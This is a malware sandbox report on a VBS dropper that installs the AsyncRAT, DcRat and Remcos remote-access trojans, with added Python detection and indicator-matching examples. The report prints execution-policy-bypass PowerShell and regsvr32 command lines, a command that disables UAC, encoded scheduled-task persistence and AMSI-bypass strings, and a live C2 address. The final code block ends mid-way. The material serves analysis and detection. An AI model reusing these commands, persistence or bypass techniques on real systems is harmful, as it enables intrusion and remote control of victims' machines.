Windows Analysis Report
lmg1_Mlakaifa443456.vbs

Overview

General Information

Sample name: lmg1_Mlakaifa443456.vbs
Analysis ID: 1431185
MD5: ade48125e600ea0434a894e7c5131462
SHA1: 8b5e29fc3d490ebcba5295332c601d8165a67ec5
SHA256: 2f7971748b7db79bdd724861d1b463b0489b790b9e60e733dea409f73abf9539
Tags: HUNvbs

Detection

AsyncRAT, DcRat, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Sigma detected: Potential Persistence Via COM Hijacking From Suspicious Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript called in batch mode (suppresses errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 380 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 5144 cmdline: "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • regsvr32.exe (PID: 3128 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • RegAsm.exe (PID: 4148 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • cmd.exe (PID: 2452 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4820 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • wscript.exe (PID: 6640 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
              • regsvr32.exe (PID: 1272 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • winhlp32.exe (PID: 3252 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
              • regsvr32.exe (PID: 3116 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • winhlp32.exe (PID: 6540 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
              • regsvr32.exe (PID: 6460 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • winhlp32.exe (PID: 6404 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
              • regsvr32.exe (PID: 3620 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • winhlp32.exe (PID: 6448 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
      • regsvr32.exe (PID: 1788 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • RegAsm.exe (PID: 4068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • regsvr32.exe (PID: 4436 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • RegAsm.exe (PID: 3160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • regsvr32.exe (PID: 5672 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • RegAsm.exe (PID: 2964 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • wscript.exe (PID: 4676 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 3852 cmdline: "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • regsvr32.exe (PID: 6664 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • winhlp32.exe (PID: 2824 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
      • regsvr32.exe (PID: 5064 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • winhlp32.exe (PID: 1560 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
      • regsvr32.exe (PID: 2616 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • winhlp32.exe (PID: 3580 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
      • regsvr32.exe (PID: 2848 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • winhlp32.exe (PID: 3396 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
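The process tree above is the detection-relevant part of this report: a 64-bit wscript.exe relaunching the script under the 32-bit host with `//b //e:vbscript`, regsvr32.exe registering dynwrapx.dll out of %TEMP%, RegAsm.exe and winhlp32.exe started with no arguments and then injected into, cmd.exe starting powershell with `ExecutionPolicy Bypass Start-Process` on a dropped .vbs, and finally wscript.exe running remc1.vbs from the Startup folder. The following Python is an added example, not part of the Joe Sandbox report: it encodes those four observations as checks over Sysmon-style process-creation records. The records are constructed from the tree above; the parent of the Startup-folder wscript.exe (explorer.exe) and the benign control event are assumptions. Note that the sample writes `ExecutionPolicy Bypass` without the leading dash, so the check deliberately does not require `-ExecutionPolicy`.

```python
"""Flag the execution chain in this report from process-creation telemetry.

Added example, not part of the Joe Sandbox report. Field names mimic Sysmon
Event ID 1, but every record below is hand-built from the process tree above.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str           # path of the new process
    cmdline: str
    parent_image: str
    parent_cmdline: str


SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
HOLLOWING_TARGETS = ("\\regasm.exe", "\\winhlp32.exe")   # the two seen on this page
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\")
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
SCRIPT_ARG = re.compile(r'"([^"]+\.(?:vbs|vbe|js|jse|wsf))"', re.I)
DLL_ARG = re.compile(r'([a-z]:\\[^"]+?\.dll)', re.I)


def _in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def _bare_launch(cmdline: str) -> bool:
    """True when the command line is only the executable, with no arguments."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return end != -1 and s[end + 1:].strip() == ""
    return " " not in s


def classify(ev: ProcEvent) -> list[str]:
    """Names of the suspicious behaviours this single event exhibits."""
    hits = []
    img, parent = ev.image.lower(), ev.parent_image.lower()

    # 1. Script host -> regsvr32 registering a DLL from a user-writable folder
    #    (page: wscript.exe -> regsvr32.exe /I /S ...\Temp\dynwrapx.dll).
    if img.endswith("\\regsvr32.exe") and parent.endswith(SCRIPT_HOSTS):
        m = DLL_ARG.search(ev.cmdline)
        if m and _in_user_writable(m.group(1)):
            hits.append("script-host-regsvr32-user-dll")

    # 2. PowerShell told to bypass its execution policy and Start-Process a script.
    #    The sample omits the dash before ExecutionPolicy, so do not require it.
    if (img.endswith("\\powershell.exe")
            and re.search(r"executionpolicy\s+bypass", ev.cmdline, re.I)
            and re.search(r"start-process", ev.cmdline, re.I)
            and SCRIPT_ARG.search(ev.cmdline)):
        hits.append("powershell-bypass-start-process-script")

    # 3. Script host executing a script from %TEMP% or the per-user Startup folder.
    if img.endswith(SCRIPT_HOSTS):
        m = SCRIPT_ARG.search(ev.cmdline)
        if m:
            path = m.group(1).lower()
            if STARTUP_DIR in path:
                hits.append("script-from-startup-folder")
            elif _in_user_writable(path):
                hits.append("script-from-user-writable-dir")

    # 4. Script host starting a signed Windows binary with no arguments at all;
    #    the page shows RegAsm.exe and winhlp32.exe launched this way and then
    #    written to ("Injects a PE file into a foreign processes").
    if parent.endswith(SCRIPT_HOSTS) and img.endswith(HOLLOWING_TARGETS) and _bare_launch(ev.cmdline):
        hits.append("script-host-spawned-bare-hollowing-target")
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """pid -> matched behaviours, omitting events that matched nothing."""
    return {ev.pid: classify(ev) for ev in events if classify(ev)}


# Records constructed from the process tree on this page.
WSH_CMD = r'"C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"'
PS_CMD = r"""powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'"""
EVENTS = [
    ProcEvent(3128, r"C:\Windows\SysWOW64\regsvr32.exe",
              r'"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"',
              r"C:\Windows\SysWOW64\wscript.exe", WSH_CMD),
    ProcEvent(4148, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
              r"C:\Windows\SysWOW64\wscript.exe", WSH_CMD),
    ProcEvent(4820, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CMD,
              r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c start /b ' + PS_CMD + " & exit"),
    ProcEvent(6640, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"',
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    ProcEvent(4676, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"',
              r"C:\Windows\explorer.exe", "explorer.exe"),   # parent is an assumption
    # Benign control (constructed): an installer registering its own DLL.
    ProcEvent(9001, r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\comp.dll"',
              r"C:\Program Files\Vendor\setup.exe", r'"C:\Program Files\Vendor\setup.exe"'),
]

if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits)
```

Each check is deliberately narrow (parent plus image plus argument shape) so that ordinary regsvr32 use by installers, or an administrator's own PowerShell, does not trip it; the control event at the end exists to show that.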
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
AsyncRAT configuration (extracted from 2.2.wscript.exe.5ed0000.2.raw.unpack):
{"Ports": ["6666"], "Server": ["139.99.133.66"], "Mutex": "MIGUELANGELES", "Certificate": "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", "Server Signature": "N3pZ2YCPJotv4dO0p9r4yZEeDnvpp9s/wXezrLSSJXN20FTY+KcXcOXJBRQV13FUX0FmBygTW0WXV3x9TGBjM7Nv//rhhRRRW37HV7bBW576W+8wt5cQpEzjMa5sPAAojC48387uRm7G9EfI2GVf5h3nL8PFY9Kvhbt1sQWDbvI="}

Remcos configuration (extracted from 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp):
{"Host:Port:Password": "139.99.133.66:4444:0", "Assigned name": "ADFLY", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "asasasas-SEG6JT", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
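Both extracted configurations point at the same server, 139.99.133.66, on two different ports (6666 for AsyncRAT, 4444 for Remcos), and the Remcos "Install flag" is Disable, which is consistent with the RAT running only inside injected winhlp32.exe processes while persistence is handled by the dropped Startup-folder script. The Python below is an added example, not part of the Joe Sandbox report: it normalises the two config formats into one (ip, port) -> family map, orients network flows regardless of which direction the sensor logged them in (the Snort alerts later on this page appear both as 49715->4444 and as 4444->49715), and reads the Remcos install fields into the host artifacts a responder should expect. The config dictionaries are trimmed copies of the ones above; the flow records are constructed from the Sysmon network event and the Snort alerts on this page (the IPs on the Snort-derived rows and the 192.0.2.10 benign row are assumptions), and the reading of "Install flag" and the "Setup ... Run" fields is my interpretation of the field names.

```python
"""Turn the two extracted RAT configurations into IOCs and match them against
connection telemetry. Added example, not part of the Joe Sandbox report."""
from typing import Optional

# Trimmed copies of the configurations printed above.
REMCOS_CFG = {
    "Host:Port:Password": "139.99.133.66:4444:0",
    "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Install path": "Application path",
    "Copy file": "remcos.exe",
    "Mutex": "asasasas-SEG6JT",
}
ASYNCRAT_CFG = {"Ports": ["6666"], "Server": ["139.99.133.66"], "Mutex": "MIGUELANGELES"}


def remcos_c2(cfg: dict) -> tuple[set[tuple[str, int]], str]:
    """Remcos packs its C2 as 'host:port:password'. Split from the right so a
    host that itself contains ':' (an IPv6 literal) does not shift the fields."""
    host, port, password = cfg["Host:Port:Password"].rsplit(":", 2)
    return {(host, int(port))}, password


def asyncrat_c2(cfg: dict) -> set[tuple[str, int]]:
    """AsyncRAT keeps parallel server and port lists; treat every pair as a C2."""
    return {(h, int(p)) for h in cfg["Server"] for p in cfg["Ports"]}


def build_iocs(remcos: dict, asyncrat: dict) -> dict[tuple[str, int], str]:
    """(ip, port) -> family. One IP hosting both listeners, as on this page,
    yields two entries that differ only by port."""
    iocs = {}
    endpoints, _password = remcos_c2(remcos)
    for ep in endpoints:
        iocs[ep] = "Remcos"
    for ep in asyncrat_c2(asyncrat):
        iocs[ep] = "AsyncRAT"
    return iocs


def mutexes(remcos: dict, asyncrat: dict) -> dict[str, str]:
    """Mutex names: the cheapest host-side check for a running implant."""
    return {remcos["Mutex"]: "Remcos", asyncrat["Mutex"]: "AsyncRAT"}


def expected_host_artifacts(remcos: dict) -> dict[str, list[str]]:
    """Artifacts the Remcos config implies. Interpretation of the field names is
    an assumption: 'Install flag' gates self-copy and the Run-key entries."""
    art = {"files": [], "registry": [], "notes": []}
    if remcos.get("Install flag") == "Enable":
        art["files"].append(f'{remcos["Install path"]}\\{remcos["Copy file"]}')
        for hive in ("HKCU", "HKLM"):
            if remcos.get(f"Setup {hive}\\Run") == "Enable":
                art["registry"].append(f"{hive}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run")
    else:
        art["notes"].append("Install flag is Disable: no self-install; persistence comes "
                            "from the loader (here the VBS dropped to the Startup folder)")
    return art


def match_flow(src: str, sport: int, dst: str, dport: int, iocs: dict) -> Optional[str]:
    """Family a flow belongs to, whichever direction the sensor logged it in."""
    return iocs.get((dst, dport)) or iocs.get((src, sport))


# Constructed from the page: Sysmon EventID 3 (winhlp32.exe PID 3252) and the
# Snort alert flows (IPs on those rows assumed), plus one benign control row.
FLOWS = [
    ("192.168.2.5", 49715, "139.99.133.66", 4444, "winhlp32.exe"),
    ("139.99.133.66", 4444, "192.168.2.5", 49715, "winhlp32.exe"),
    ("139.99.133.66", 6666, "192.168.2.5", 49704, None),
    ("192.168.2.5", 49800, "192.0.2.10", 443, "msedge.exe"),
]


def triage_flows(flows, iocs: dict) -> list[tuple[str, int, Optional[str]]]:
    """(family, local ephemeral port, image) for every flow touching a configured C2."""
    out = []
    for src, sport, dst, dport, image in flows:
        fam = match_flow(src, sport, dst, dport, iocs)
        if fam:
            local_port = sport if (dst, dport) in iocs else dport
            out.append((fam, local_port, image))
    return out


if __name__ == "__main__":
    iocs = build_iocs(REMCOS_CFG, ASYNCRAT_CFG)
    print(iocs)
    print(triage_flows(FLOWS, iocs))
    print(expected_host_artifacts(REMCOS_CFG))
```

Matching on the (ip, port) pair rather than the IP alone matters here: the same address serves two families, and the port is what tells a responder which implant's config (mutex, file names) to look for on the host.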
Source: dump.pcap
  Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
    • 0x3a2:$b2: DcRat By qwqdanchun1

Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
  Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
  Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
    • 0x6c4a8:$a1: Remcos restarted by watchdog!
    • 0x6ca20:$a3: %02i:%02i:%02i:%03i
  Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
    • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
    • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6656c:$str_b2: Executing file:
    • 0x675ec:$str_b3: GetDirectListeningPort
    • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x67118:$str_b7: \update.vbs
    • 0x66594:$str_b9: Downloaded file:
    • 0x66580:$str_b10: Downloading file:
    • 0x66624:$str_b12: Failed to upload file:
    • 0x675b4:$str_b13: StartForward
    • 0x675d4:$str_b14: StopForward
    • 0x67070:$str_b15: fso.DeleteFile "
    • 0x67004:$str_b16: On Error Resume Next
    • 0x670a0:$str_b17: fso.DeleteFolder "
    • 0x66614:$str_b18: Uploaded file:
    • 0x665d4:$str_b19: Unable to delete:
    • 0x67038:$str_b20: while fso.FileExists("
    • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
  Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
    • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
    • 0x6637c:$s1: CoGetObject
    • 0x66390:$s1: CoGetObject
    • 0x663ac:$s1: CoGetObject
    • 0x70338:$s1: CoGetObject
    • 0x6633c:$s2: Elevation:Administrator!new:
  (88 further entries not shown)

Source: 2.2.wscript.exe.5670000.0.raw.unpack
  Rule: JoeSecurity_AsyncRAT | Description: Yara detected AsyncRAT | Author: Joe Security
  Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
    • 0x65ff:$a1: havecamera
    • 0x9a7c:$a2: timeout 3 > NUL
    • 0x9a9c:$a3: START "" "
    • 0x9927:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
    • 0x99dc:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
  Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts | Description: Detects executables embedding base64-encoded APIs, command lines, registry keys, etc. | Author: ditekSHen
    • 0x99dc:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
    • 0x9927:$s2: L2Mgc2NodGFza3MgL2
    • 0x98a6:$s3: QW1zaVNjYW5CdWZmZXI
    • 0x98f4:$s4: VmlydHVhbFByb3RlY3Q
  Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Description: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
    • 0x9c5e:$q1: Select * from Win32_CacheMemory
    • 0x9c9e:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
    • 0x9cec:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
    • 0x9d3a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
  Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy | Description: Detects executables containing the string DcRatBy | Author: ditekSHen
    • 0xa0d6:$s1: DcRatBy
  (120 further entries not shown)
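The DcRat and B64_Artifacts rule hits above are worth decoding: the matched fragments are base64 of a schtasks command line (`/c schtasks /create /f /sc onlogon /rl highest /tn `), of the Run key path (`SOFTWARE\Microsoft\Windows\CurrentVersion\Run\`), and of the API names `AmsiScanBuffer` and `VirtualProtect`, which is how the .NET stage hides its persistence and AMSI-patching strings from plain string scanners. The Python below is an added example, not part of the report or of the YARA rules it cites. It decodes those fragments (copied from the rule output above; the dictionary keys are my labels) and shows why a rule needs up to three spellings of one string: the base64 of a substring depends on its offset modulo 3 inside the encoded blob, and the last character of a fixed spelling also encodes bits of the byte that follows the string. The scanned blobs are constructed here.

```python
"""Decode the base64 fragments matched above and search for base64-encoded
strings at any alignment. Added example, not part of the Joe Sandbox report."""
import base64

# Matched strings copied from the YARA output on this page (labels are mine).
PAGE_FRAGMENTS = {
    "dcrat_a4": "L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g",
    "dcrat_a5": "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==",
    "b64_s2": "L2Mgc2NodGFza3MgL2",
    "b64_s3": "QW1zaVNjYW5CdWZmZXI",
    "b64_s4": "VmlydHVhbFByb3RlY3Q",
}


def decode_fragment(frag: str) -> str:
    """Decode a base64 fragment that may be cut mid-group, as YARA string matches
    are: restore padding and drop a lone trailing char (it carries no whole byte)."""
    s = frag.rstrip("=")
    if len(s) % 4 == 1:
        s = s[:-1]
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s).decode("latin-1")


def decode_page_fragments() -> dict[str, str]:
    return {name: decode_fragment(frag) for name, frag in PAGE_FRAGMENTS.items()}


def b64_variants(plain: bytes) -> list[str]:
    """The three base64 spellings of `plain`, one per alignment (offset mod 3) of
    the string inside the encoded blob. Characters that also depend on unknown
    neighbouring bytes are cut away, so each spelling matches whatever surrounds
    the string."""
    variants = []
    for pad in range(3):
        total = pad + len(plain)
        enc = base64.b64encode(b"\x00" * pad + plain).decode().rstrip("=")
        lead = (0, 2, 3)[pad]                           # chars tainted by the dummy prefix
        keep = 4 * (total // 3) + (0, 1, 2)[total % 3]  # chars fixed entirely by known bytes
        variants.append(enc[lead:keep])
    return variants


def find_b64_encoded(buf: bytes, plain: bytes) -> list[tuple[int, int]]:
    """(offset, alignment) of every base64 spelling of `plain` found in `buf`."""
    hits = []
    for align, spelling in enumerate(b64_variants(plain)):
        needle, start = spelling.encode(), 0
        while (i := buf.find(needle, start)) != -1:
            hits.append((i, align))
            start = i + 1
    return hits


# Constructed blobs. BLOB puts "AmsiScanBuffer" at alignment 1 behind one byte.
# BLOB_NUL / BLOB_Z show the limit of the rule's fixed 19-char spelling
# "QW1zaVNjYW5CdWZmZXI": its final 'I' also encodes the top two bits of the
# byte after the string, so it only matches when that byte is below 0x40.
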